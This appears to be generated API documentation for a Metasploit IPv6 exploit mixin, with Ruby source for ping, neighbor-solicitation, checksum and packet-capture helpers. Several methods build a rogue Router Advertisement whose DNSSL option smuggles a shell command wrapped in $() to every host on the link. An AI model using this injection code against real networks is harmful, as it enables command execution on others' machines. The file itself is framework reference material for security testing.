Module: Msf::Exploit::Remote::Ipv6

Defined in:
lib/msf/core/exploit/remote/ipv6.rb

Overview

This module provides common tools for IPv6

Instance Method Summary collapse

Instance Method Details

#check_pcaprub_loadedObject



416
417
418
419
420
421
422
423
424
# File 'lib/msf/core/exploit/remote/ipv6.rb', line 416

def check_pcaprub_loaded
    unless @pcaprub_loaded
      print_status("The Pcaprub module is not available: #{@pcaprub_error}")
      raise RuntimeError, "Pcaprub not available"
    else
      true
  end

end

#close_icmp_pcapObject

Close the capture interface



74
75
76
77
78
79
# File 'lib/msf/core/exploit/remote/ipv6.rb', line 74

def close_icmp_pcap()
  check_pcaprub_loaded

  return if not @ipv6_icmp6_capture
  @ipv6_icmp6_capture = nil
end

#initialize(info = {}) ⇒ Object

Initializes an instance of an exploit module that captures traffic



15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
# File 'lib/msf/core/exploit/remote/ipv6.rb', line 15

def initialize(info = {})
  super
  register_options(
    [
      OptString.new('INTERFACE', [false, 'The name of the interface']),
      OptString.new("SMAC", [ false, "The source MAC address"]),
      OptAddress.new("SHOST", [ false, "The source IPv6 address" ] ),
      OptInt.new("TIMEOUT", [ true, "Timeout when waiting for host response.", 5])
    ], Msf::Exploit::Remote::Ipv6
  )

  begin
    require 'pcaprub'
    @pcaprub_loaded = true
  rescue ::Exception => e
    @pcaprub_loaded = false
    @pcaprub_error  = e
  end
end

#ipv6_build_dnssl_option(cmd, lifetime = 0xFFFFFFFF) ⇒ Object



341
342
343
344
345
346
347
348
349
350
351
352
353
# File 'lib/msf/core/exploit/remote/ipv6.rb', line 341

def ipv6_build_dnssl_option(cmd, lifetime = 0xFFFFFFFF)
  data = ipv6_encode_domain("#{rand_text_alpha(6..10)}.local") + ipv6_encode_dnssl_payload(cmd)

  # Pad to 8-byte boundary (option header is 8 bytes)
  pad_len = -data.length % 8
  data << "\x00" * pad_len

  # Option header: Type(1) + Length(1) + Reserved(2) + Lifetime(4)
  # Length is in units of 8 octets, including header
  length_units = (8 + data.length) / 8

  [31, length_units, 0].pack('CCn') + [lifetime].pack('N') + data
end

#ipv6_build_prefix_info_optionObject

Build Prefix Information option (RFC 4861)



362
363
364
365
366
367
368
369
370
371
372
373
374
375
# File 'lib/msf/core/exploit/remote/ipv6.rb', line 362

def ipv6_build_prefix_info_option
  type = 3
  length = 4 # 32 bytes / 8
  prefix_len = 64
  flags = 0xC0 # L=1, A=1 (on-link, autonomous address config)
  valid_lifetime = 30.days.to_i
  preferred_lifetime = 7.days.to_i
  reserved = 0
  prefix = IPAddr.new('2001:db8::').hton

  [type, length, prefix_len, flags].pack('CCCC') +
    [valid_lifetime, preferred_lifetime, reserved].pack('NNN') +
    prefix
end

#ipv6_build_ra_packet(smac, payload_cmd, shost = 'fe80::1') ⇒ Object

Build the complete Router Advertisement packet



392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
# File 'lib/msf/core/exploit/remote/ipv6.rb', line 392

def ipv6_build_ra_packet(smac, payload_cmd, shost = 'fe80::1')
  # Build ICMPv6 RA with options
  ra_payload = ipv6_build_ra_payload
  ra_payload << ipv6_build_slla_option(smac)
  ra_payload << ipv6_build_prefix_info_option
  ra_payload << ipv6_build_dnssl_option(payload_cmd)

  # Build IPv6 packet
  p = PacketFu::IPv6Packet.new
  p.eth_saddr = smac
  p.eth_daddr = '33:33:00:00:00:01' # All-nodes multicast (https://datatracker.ietf.org/doc/html/rfc4861#section-4.2)
  p.ipv6_saddr = shost # Link-local address (https://datatracker.ietf.org/doc/html/rfc4291#section-2.5.6)
  p.ipv6_daddr = 'ff02::1' # All-nodes multicast address (https://datatracker.ietf.org/doc/html/rfc4291-2.5.6#section-2.7.1)
  p.ipv6_hop = 255
  p.ipv6_next = 0x3a # ICMPv6

  p.payload = ra_payload
  p.ipv6_len = ra_payload.length

  ipv6_checksum!(p)

  p
end

#ipv6_build_ra_payloadObject

Build ICMPv6 Router Advertisement payload



378
379
380
381
382
383
384
385
386
387
388
389
# File 'lib/msf/core/exploit/remote/ipv6.rb', line 378

def ipv6_build_ra_payload
  type = 134 # Router Advertisement
  code = 0
  checksum = 0
  cur_hop_limit = 64
  flags = 0x40 # O flag (Other configuration)
  router_lifetime = 1800
  reachable_time = 0
  retrans_timer = 0

  [type, code, checksum, cur_hop_limit, flags, router_lifetime, reachable_time, retrans_timer].pack('CCnCCnNN')
end

#ipv6_build_slla_option(mac) ⇒ Object

Build Source Link-Layer Address option (www.rfc-editor.org/rfc/rfc4861)



356
357
358
359
# File 'lib/msf/core/exploit/remote/ipv6.rb', line 356

def ipv6_build_slla_option(mac)
  mac_bytes = mac.split(':').map { |x| x.to_i(16) }.pack('C6')
  [1, 1].pack('CC') + mac_bytes
end

#ipv6_checksum!(pkt) ⇒ Object

Usual ghetto strategy from PacketFu



277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
# File 'lib/msf/core/exploit/remote/ipv6.rb', line 277

def ipv6_checksum!(pkt)
  check_data = pkt.headers.last[:ipv6_src].to_s.unpack("n8")
  check_data << pkt.headers.last[:ipv6_dst].to_s.unpack("n8")
  check_data << pkt.ipv6_len
  check_data << [0,58]
  check_payload = pkt.payload.size % 2 == 0 ? pkt.payload : pkt.payload + "\x00"
  check_data << check_payload.unpack("n*")
  check_data.flatten!
  checksum = check_data.inject(0) {|sum,x| sum += x}
  checksum = checksum % 0xffff
  checksum = 0xffff - checksum
  checksum == 0 ? 0xffff : checksum
  pkt.payload[2,2] = [checksum].pack("n")
  pkt
end

#ipv6_encode_dnssl_payload(cmd) ⇒ Object

Encode a command payload as DNS label format for DNSSL injection. Wraps the command in $() for shell substitution and splits into 63-byte chunks (max DNS label length).



324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
# File 'lib/msf/core/exploit/remote/ipv6.rb', line 324

def ipv6_encode_dnssl_payload(cmd)
  payload_str = "$(#{cmd})"
  payload_bytes = payload_str.encode('ASCII-8BIT')

  if payload_bytes.length <= 63
    return [payload_bytes.length].pack('C') + payload_bytes + "\x00"
  end

  result = ''
  until payload_bytes.empty?
    chunk = payload_bytes.slice!(0, 63)
    result << [chunk.length].pack('C') << chunk
  end
  result << "\x00"
end

#ipv6_encode_domain(name) ⇒ Object

Encode a domain name in DNS label format (length-prefixed labels, null-terminated)



310
311
312
313
314
315
316
317
318
319
# File 'lib/msf/core/exploit/remote/ipv6.rb', line 310

def ipv6_encode_domain(name)
  result = ''
  name.split('.').each do |label|
    next if label.empty?

    data = label.encode('ASCII-8BIT')
    result << [data.length].pack('C') << data
  end
  result << "\x00"
end

#ipv6_icmpv6_echo_request(id, seq, data) ⇒ Object

Helper methods that haven’t made it upstream yet. Mostly packet data packers, also a checksum calculator.



220
221
222
223
224
225
226
227
# File 'lib/msf/core/exploit/remote/ipv6.rb', line 220

def ipv6_icmpv6_echo_request(id,seq,data)
  type = 0x80
  code = 0
  checksum = 0
  id ||= rand(0x10000)
  seq ||= rand(0x10000)
  [type,code,checksum,id,seq,data].pack("CCnnna*")
end

#ipv6_interface(opts = {}) ⇒ Object

Shortcut method for resolving our local interface name



39
40
41
# File 'lib/msf/core/exploit/remote/ipv6.rb', line 39

def ipv6_interface(opts={})
  opts['INTERFACE'] || datastore['INTERFACE'] || ::Pcap.lookupdev
end

Shortcut method for determining our link-local address



46
47
48
# File 'lib/msf/core/exploit/remote/ipv6.rb', line 46

def ipv6_link_address(opts={})
  Rex::Socket.ipv6_link_address(ipv6_interface(opts))
end

#ipv6_linklocaladdr(mac) ⇒ Object

From Jon Hart’s Racket::L3::Misc#linklocaladdr(), which is from Daniele Bellucci



245
246
247
248
249
# File 'lib/msf/core/exploit/remote/ipv6.rb', line 245

def ipv6_linklocaladdr(mac)
  mac = mac.split(":")
  mac[0] = (mac[0].to_i(16) ^ (1 << 1)).to_s(16)
  ["fe80", "", mac[0,2].join, mac[2,2].join("ff:fe"), mac[4,2].join].join(":")
end

#ipv6_mac(opts = {}) ⇒ Object

Shortcut method for determining our MAC address



53
54
55
# File 'lib/msf/core/exploit/remote/ipv6.rb', line 53

def ipv6_mac(opts={})
  Rex::Socket.ipv6_mac(ipv6_interface(opts))
end

#ipv6_neighbor_solicitation(neigh, smac) ⇒ Object

Takes a neighbor and smac as arguments, The Neighbor value must be an int, while the smac must be a string. Very rudimentary and temporary.



296
297
298
299
300
301
302
303
304
305
306
307
# File 'lib/msf/core/exploit/remote/ipv6.rb', line 296

def ipv6_neighbor_solicitation(neigh,smac)
  target = neigh.to_s(16).scan(/../).map {|x| x.to_i(16)}.pack("C*")
  type = 135
  code = 0
  checksum = 0
  reserved = 0
  opt_type = 1
  opt_len = 1
  [type, code, checksum, reserved,
    target, opt_type, opt_len, smac
  ].pack("CCnNa16CCa6")
end

#ipv6_parse_options(data) ⇒ Object

Simple tlv parser



230
231
232
233
234
235
236
237
238
239
240
241
# File 'lib/msf/core/exploit/remote/ipv6.rb', line 230

def ipv6_parse_options(data)
  pos = 0
  opts = []
  while pos < data.size
    type, len = data[pos,2].unpack("CC")
    this_opt = [type,len]
    this_opt << data[pos+2, (pos-2 + (len * 8))]
    opts << this_opt
    pos += this_opt.pack("CCa*").size
  end
  opts
end

#ipv6_soll_mcast_addr6(addr) ⇒ Object

From Jon Hart’s Racket::L3::Misc#soll_mcast_addr6(), which is from DDniele Belluci



253
254
255
256
257
258
259
260
261
262
263
# File 'lib/msf/core/exploit/remote/ipv6.rb', line 253

def ipv6_soll_mcast_addr6(addr)
  h = addr.split(':')[-2, 2]
  m = []
  x = h[0]
  x[0..1] = 'ff'
  m << x
  x = h[1]
  x.sub!(/^0*/, "")
  m << x
  'ff02::1:' + m.join(':')
end

#ipv6_soll_mcast_mac(addr) ⇒ Object

From Jon Hart’s Racket::L3::Misc#soll_mcast_mac()



266
267
268
269
270
271
272
273
274
# File 'lib/msf/core/exploit/remote/ipv6.rb', line 266

def ipv6_soll_mcast_mac(addr)
  h = addr.split(':')[-2, 2]
  m = []
  m << 'ff'
  m << (h[0].to_i(16) & 0xff).to_s(16)
  m << ((h[1].to_i(16) & (0xff << 8)) >> 8).to_s(16)
  m << (h[1].to_i(16) & 0xff).to_s(16)
  '33:33:' + m.join(':')
end

#open_icmp_pcap(opts = {}) ⇒ Object

Opens a pcaprub capture interface to inject packets, and sniff ICMPv6 packets



61
62
63
64
65
66
67
68
69
# File 'lib/msf/core/exploit/remote/ipv6.rb', line 61

def open_icmp_pcap(opts = {})
  check_pcaprub_loaded

  dev = ipv6_interface(opts)
  len = 65535
  tim = 0
  @ipv6_icmp6_capture = ::Pcap.open_live(dev, len, true, tim)
  @ipv6_icmp6_capture.setfilter("icmp6")
end

#ping6(dhost, opts = {}) ⇒ Object

Send a ICMPv6 Echo Request, and wait for the associated ICMPv6 Echo Response



148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
# File 'lib/msf/core/exploit/remote/ipv6.rb', line 148

def ping6(dhost, opts={})
  check_pcaprub_loaded

  dhost_intf = dhost + '%' + ipv6_interface(opts)

  smac = opts['SMAC'] || datastore['SMAC'] || ipv6_mac
  shost = opts['SHOST'] || datastore['SHOST'] || Rex::Socket.source_address(dhost_intf)
  dmac = opts['DMAC'] || solicit_ipv6_mac(dhost)
  timeout = opts['TIMEOUT'] || datastore['TIMEOUT']
  wait = opts['WAIT']


  if(wait.eql?(nil))
    wait = true
  end

  dmac.eql?(nil) and return false

  open_icmp_pcap()

  # Create ICMPv6 Request
  p = PacketFu::IPv6Packet.new
  p.eth_saddr = smac
  p.eth_daddr = dmac
  p.ipv6_saddr = shost
  p.ipv6_daddr = dhost
  p.ipv6_next = 0x3a
  icmp_id = rand(65000)
  icmp_seq = 1
  icmp_payload = Rex::Text.rand_text(8)
  p.payload = ipv6_icmpv6_echo_request(icmp_id,icmp_seq,icmp_payload)
  p.ipv6_len = p.payload.to_s.size
  ipv6_checksum!(p)

  @ipv6_icmp6_capture.inject(p.to_s)

  if(wait.eql?(true))
    print_status("Waiting for ping reply...")
    print_line("")
    # Wait for a response
    max_epoch = ::Time.now.to_i + timeout
    while(::Time.now.to_i < max_epoch)
      pkt = @ipv6_icmp6_capture.next()
      next if not pkt
      response_pkt = PacketFu::Packet.parse(pkt) rescue nil
      next unless response_pkt
      next unless response_pkt.is_ipv6?
      next unless response_pkt.payload
      next if response_pkt.payload.empty?
      next unless response_pkt.payload[0,1] == "\x81" # Echo reply
      if( response_pkt.ipv6_daddr == p.ipv6_saddr and
         response_pkt.ipv6_saddr == p.ipv6_daddr and
         response_pkt.ipv6_daddr == p.ipv6_saddr and
         response_pkt.payload[4,2] == p.payload[4,2] and # Id
         response_pkt.payload[6,2] == p.payload[6,2] # Seq
        )
        close_icmp_pcap()
        return(true)
      end

    end # End while
  end

  close_icmp_pcap()
  return(false)
end

#solicit_ipv6_mac(dhost, opts = {}) ⇒ Object

Send out a ICMPv6 neighbor solicitation, and return the associated MAC address



85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
# File 'lib/msf/core/exploit/remote/ipv6.rb', line 85

def solicit_ipv6_mac(dhost, opts = {})
  check_pcaprub_loaded

  dhost_intf = dhost + '%' + ipv6_interface(opts)

  smac = opts['SMAC'] || datastore['SMAC'] || ipv6_mac
  shost = opts['SHOST'] || datastore['SHOST'] || Rex::Socket.source_address(dhost_intf)
  timeout = opts['TIMEOUT'] || datastore['TIMEOUT'] || 3

  open_icmp_pcap()

  p2 = PacketFu::IPv6Packet.new
  p2.eth_saddr = smac
  p2.eth_daddr = ipv6_soll_mcast_mac(dhost)
  p2.ipv6_saddr = shost
  p2.ipv6_daddr = ipv6_soll_mcast_addr6(dhost)
  p2.ipv6_hop = 255
  p2.ipv6_next = 0x3a
  p2.payload = ipv6_neighbor_solicitation(
    IPAddr.new(dhost).to_i,
    p2.eth_src
  )
  p2.ipv6_len = p2.payload.size
  ipv6_checksum!(p2)

  @ipv6_icmp6_capture.inject(p2.to_s)

  # Wait for a response
  max_epoch = ::Time.now.to_i + timeout
  while(::Time.now.to_i < max_epoch)
    pkt_bytes = @ipv6_icmp6_capture.next()
    next if not pkt_bytes
    pkt = PacketFu::Packet.parse(pkt_bytes) rescue nil
    next unless pkt
    next unless pkt.is_ipv6?
    next unless pkt.ipv6_next == 0x3a
    next unless pkt.payload
    next if pkt.payload.empty?
    next unless pkt.payload[0,1] == "\x88" # Neighbor advertisement
    if(IPAddr.new(pkt.ipv6_daddr).to_i == IPAddr.new(shost).to_i and
       IPAddr.new(pkt.ipv6_saddr).to_i == IPAddr.new(dhost).to_i)
       ipv6opts = pkt.payload[24,pkt.payload.size]
       next unless ipv6opts
       parsed_opts = ipv6_parse_options(ipv6opts)
       parsed_opts.each do |opt|
         if opt[0] == 2
           addr = PacketFu::EthHeader.str2mac(opt.last)
           close_icmp_pcap()
           return(addr)
         end
       end
       close_icmp_pcap
       return(pkt.eth_saddr)
    end
  end
  close_icmp_pcap
  return nil
end